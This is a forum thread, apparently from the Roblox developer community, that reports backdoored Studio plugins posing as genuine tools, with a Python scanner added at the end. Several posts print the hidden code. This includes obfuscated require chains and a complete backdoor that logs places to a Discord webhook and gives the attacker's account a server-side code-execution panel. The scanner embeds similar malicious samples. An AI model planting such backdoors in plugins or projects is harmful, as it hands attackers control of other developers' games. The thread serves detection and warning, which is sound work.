yusatial
(yusa)
May 30, 2020, 3:33pm
#44
Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Both of the malicious actions lead to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script; however, by constant dumping and inspecting its constants, it’s clear that it’s a backdoor. Its constant dump can be found here - https://pastebin.com/raw/FhZyxTty .
1 Like
F3X Plugin
Malicious:
Original:
Fake Anti-Virus/Backdoor Scanner
Malicious:
1 Like
yusatial
(yusa)
May 30, 2020, 7:01pm
#47
1 Like
NickoSCP
(NickoSCP)
June 7, 2020, 6:38pm
#48
Malicious Script, plugin unknown
require(4751241292)()
Malicious Action
-- Shadow the global `script` so the rest of the code uses a local copy
local Orig = script
script = nil
local script = Orig
-- The GUI that gets handed to the attacker's account (the "serverside" loadstring panel)
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
-- Probe whether HttpService is enabled by fetching a harmless public URL
function CheckHttp()
    local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
    if f == true then
        return true
    else
        return false
    end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
    local A = CheckHttp()
    if A == true then
        -- Report the place id and player count to a Discord webhook
        local Data = {
            content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
            username = "wet man"
        }
        HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
    end
    -- Only the attacker's account, or friends of it, receive the panel
    if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
        GUI:Clone().Parent = plr.PlayerGui
    end
end)
-- Same check for players who were already in the server when the script ran
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
    if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
        GUI:Clone().Parent = plr.PlayerGui
    end
end
-- Log the place once more on startup
local A = CheckHttp()
if A == true then
    local Data = {
        content = "omg a game! https://www.roblox.com/games/"..game.PlaceId;
        username = "wet man"
    }
    HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
-- Return an empty function so that require(...)() completes without error
return function()end
Essentially gives a serverside loadstring gui if a player is or is friends with…
https://www.roblox.com/users/1460281907/profile
Edit: The Discord webhook has already been found to be invalidated; someone else probably already deleted it.
2 Likes
NickoSCP
(NickoSCP)
July 6, 2020, 10:57pm
#49
Fake “content deleted” backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.
After chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them, I reached the obfuscated code.
I’m not bothering to go into full detail on why I believe this is malicious, due to having an alternative issue that I consider to be ‘robloxsevere’.
This plugin is possibly malicious:
I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.
1 Like
Webm07
(Webm07)
July 24, 2020, 11:29am
#51
Malicious
.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)
Malicious
RStudioUpdate & Script contain obfuscated code
Real Roundify
Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory
Tag Editor
Original: 948084095
Malicious: 4972325708
Creates an Antilag script in ServerScriptService upon installation.
1 Like
F3X Building Tools & LoadCharacter.
If someone can check these plugins: these were all botted to the front page and probably insert serversides (if I’m correct).
Malicious plugin(s): 5754612786 , 5864780072
Original plugin: 752585459
Malicious: 5747884333 , 5747884333 , 5727376746 , and many more.
Original: 144950355
Also, it isn’t even possible to find the original plugin anymore 60% of the time.
Should add an email requirement for uploading plugins, even in bestselling when searching.
5 Likes
Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.
ghidras
(popbob)
November 2, 2020, 9:11pm
#55
Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.
Roblox Studio+ (Updated)
Backdoored: 5770454604
There isn’t a Roblox Studio+ original model, and the model leads to:
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)
Which in turn leads to a model called Linker, which links to an asset named Poseidon SS, another serverside which looks heavily skidded.
1 Like
Praeterian
(Praeterian)
November 25, 2020, 11:48pm
#56
Why does this point to a “dummy.com” URL? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.
The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about
2 Likes
ghidras
(popbob)
November 26, 2020, 8:03am
#57
dummy.com or google.com are usually domains that serversides use for non-HTTP game logging.
3 Likes
deluc_t
(Deluct)
December 26, 2020, 4:28pm
#59
How can you log games with google.com or dummy.com? They use Discord.
They check if the HTTP service is enabled by sending a GET request to those URLs: if it fails, it’s disabled; if it succeeds, then it’s enabled.
1 Like
deluc_t
(Deluct)
December 26, 2020, 8:46pm
#61
1 Like
No duh, of course they do that to send the game to the logs.
deluc_t
(Deluct)
December 26, 2020, 8:49pm
#63
They do that to send to logs, and they usually use it for checking if HTTP is enabled.
(desterify said that they log games with google.com, which they don’t)
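The indicators that come up repeatedly in this thread (the `require` call hidden behind a decimal-escaped or `string.reverse`d string in #44 and #55, the `require(<asset id>)` chains in #48 and #49, and the google.com/dummy.com `GetAsync` probe followed by a Discord webhook `PostAsync` in #48 and #59) can all be found with a small static scan of plugin source before you install it. The Python scanner below is an added example, not code from the thread or from any of the plugins it names; the Lua snippets inside it are constructed to mirror the patterns posted above, and the webhook path in the logger sample is a placeholder.

```python
"""Static indicator scan for Roblox plugin/model Lua source (added example)."""
import re
from typing import List, Tuple

# --- Normalization: undo the cheap obfuscations seen in the thread ---

# Lua decimal byte escapes, e.g. "\114\101\113" -> "req"
_DEC_ESCAPE = re.compile(r"\\(\d{1,3})")
# string.reverse applied directly to a string literal
_REVERSE_LITERAL = re.compile(r'string\.reverse\(\s*(["\'])(.*?)\1\s*\)')


def decode_lua_escapes(src: str) -> str:
    """Replace \\ddd decimal escapes with the characters they encode."""
    return _DEC_ESCAPE.sub(lambda m: chr(int(m.group(1))), src)


def normalize(src: str) -> str:
    """Decode escapes, then fold string.reverse("literal") into the reversed literal."""
    src = decode_lua_escapes(src)
    return _REVERSE_LITERAL.sub(lambda m: m.group(1) + m.group(2)[::-1] + m.group(1), src)


# --- Indicators: (name, regex run over the normalized source) ---
_INDICATORS = [
    # getfenv()["require"](id): the require call hidden behind an environment lookup
    ("obfuscated_require",
     re.compile(r'getfenv\(\)\s*\[\s*["\']require["\']\s*\]\s*\(\s*(\d+)')),
    # require(<asset id>): loads a MainModule by numeric id (the "require chain")
    ("require_by_asset_id", re.compile(r'\brequire\s*\(\s*(\d+)\s*\)')),
    # PostAsync to a Discord webhook: the game/place logging channel
    ("discord_webhook_post",
     re.compile(r'PostAsync\s*\(?\s*["\'](https?://(?:www\.)?discord(?:app)?\.com[^"\']*)')),
    # GetAsync to google.com / dummy.com: probing whether HttpService is enabled
    ("http_enabled_probe",
     re.compile(r'GetAsync\s*\(?\s*["\'](https?://(?:www\.)?(?:google|dummy)\.com[^"\']*)')),
    # loadstring: the code-execution primitive behind "serverside" panels
    ("loadstring", re.compile(r'\bloadstring\b')),
]


def scan(src: str) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs found in the de-obfuscated source."""
    normalized = normalize(src)
    findings = []
    for name, pattern in _INDICATORS:
        for m in pattern.finditer(normalized):
            detail = m.group(1) if m.groups() else m.group(0)
            findings.append((name, detail))
    return findings


# Constructed samples mirroring the patterns quoted in the thread.
SAMPLE_ESCAPED_REQUIRE = r"pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)"
SAMPLE_REVERSED_REQUIRE = r'getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)'
SAMPLE_REQUIRE_CHAIN = "require(4751241292)()"
SAMPLE_LOGGER = """
local HTTP = game:GetService('HttpService')
local ok = pcall(function() HTTP:GetAsync'https://www.google.com' end)
if ok then
  -- EXAMPLE-WEBHOOK is a placeholder, not a real webhook path
  HTTP:PostAsync('https://discordapp.com/EXAMPLE-WEBHOOK', HTTP:JSONEncode({content = game.PlaceId}))
end
"""

if __name__ == "__main__":
    for label, sample in [("escaped require", SAMPLE_ESCAPED_REQUIRE),
                          ("reversed require", SAMPLE_REVERSED_REQUIRE),
                          ("require chain", SAMPLE_REQUIRE_CHAIN),
                          ("webhook logger", SAMPLE_LOGGER)]:
        print(label, "->", scan(sample))
```

Run it over the source of every script inside a plugin or model before installing it; any `obfuscated_require` or `require_by_asset_id` hit is worth following to the referenced asset, since that is exactly how the chains in #44, #48 and #55 hide the real payload. The normalization step is what matters: matching on the literal text `require` would miss both the escaped and the reversed forms.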